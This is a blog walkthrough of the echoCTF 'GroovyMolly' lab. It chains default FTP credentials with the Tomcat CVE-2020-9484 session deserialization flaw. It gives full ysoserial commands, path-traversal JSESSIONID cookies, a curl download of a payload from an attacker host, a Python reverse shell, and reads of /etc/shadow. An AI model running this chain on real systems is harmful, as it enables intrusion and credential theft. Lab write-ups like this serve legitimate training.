« Posts tagged tomcat

GroovyMolly – Walk Through – echoCTF

IP Address: 10.0.40.34
Description: You may be thinking that Groovy Molly is random but its not…
Extra Info: Try to make the server spill the beans. You will have to combine both services to make something worthwhile…

Steps:
So we start by entering the IP Address in browser, which returns nothing.

Next step we did is Nmap Scan:
nmap -Pn -T5 -n 10.0.40.34
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 15:28 Pakistan Standard Time
Nmap scan report for 10.0.40.34
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
2121/tcp open ccproxy-ftp
8080/tcp open http-proxy


Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds

First, we will hit port 8080 because it looks like a web service port.
Opening http://10.0.40.34:8080/ in browser we get “Simple is not always Easy” text.
On checking the HTML source of this page, we see comments with our first flag: ETSCTF_x

This page has many other strings but after playing with GET,POST,SESSION and COOKIES, we got nothing.

Now we hit http://10.0.40.34:8080/test to get the web server details:
Apache Tomcat/10.0.0-M4

Looked up online for available exploits for this web server and found a PoC for “CVE-2020-9484”

For this exploit to work, we must have our file uploaded on the target system.

Moving on to the next port 2121, which looks like custom FTP port but lets netcat to make sure:
nc 10.0.40.34 2121

Above command returns “220 Service ready for new user.” which confirms that its FTP service.

Now we login to this FTP service anonymously using:
Username: anonymous
Password: root@localhost

Once logged in, we get two files in the FTP folder:
One is our second flag ETSCTF_xx
The other one is a “README.txt” file with the text:
Default user root directory.PWD:/opt/apache-ftpserver-1.1.1/res/home/

We now know that the FTP Server running is Apache FTP Server with version 1.1.1

Now we tried to upload files on the FTP server which gave “Permission Denied” errors means anonymous users don’t have enough rights.

Looked for Apache FTP Server 1.1.1 exploits online but nothing worked.

Downloaded Apache FTP Server 1.1.1 to see if we can get any further clues.

Looking at the configuration files, we got the default credentials:
Username: admin
Password: admin

Logging in to the FTP Server, now we can write files.

We have to generate our stager payload files that we will upload on the FTP service to make this exploit work.

On our Kali machine we create a file named “payload.sh” with the following content:
#!/usr/bin/bash
python -c 'import


socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.54",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

In the same directory, we have to run this command so we can transfer our final payload to the target server:
python -m SimpleHTTPServer 8888

Downloaded “ysoserial” and ran these commands for generating stager payload files:
java -jar ysoserial.jar Groovy1 'curl http://10.10.0.54:8888/payload.sh -o /tmp/payload.sh' > downloadPayload.session

java -jar ysoserial.jar Groovy1 ‘chmod 777 /tmp/payload.sh’ > chmodPayload.session


java -jar ysoserial.jar Groovy1 'bash /tmp/payload.sh' > executePayload.session

We changed the default transfer mode of FTP service to binary mode otherwise the exploit doesn’t work.

Run our Netcat listener on attacker machine using:
nc -nlvp 80

Uploaded these three stager payload files on FTP Server and now we run the Tomcat exploit as discussed above:
curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/downloadPayload'

curl ‘http://10.0.40.34:8080/index.jsp’ -H ‘Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/chmodPayload’


curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/executePayload'

As soon as we run the last curl command, we get our Netcat reverse connection and guess what, Tomcat is run by default as root 🙂

Since we are root, we easily get our remaining flags using these commands:
cat /etc/passwd | grep ETSCTF -> ETSCTF_xxx
cat /etc/shadow | grep ETSCTF -> ETSCTF_xxxx
ls -lah /root/ | grep ETSCTF -> ETSCTF_xxxxx
env | grep ETSCTF -> ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this interesting challenge 🙂

Notes:
1- Replace the “10.10.0.54” with your attacker IP Address.
3- Simple bash reverse shell variations didn’t work for some reason and only Python shell worked.
2- Had to get hint from Discord channel regarding the “binary mode” switching in FTP service.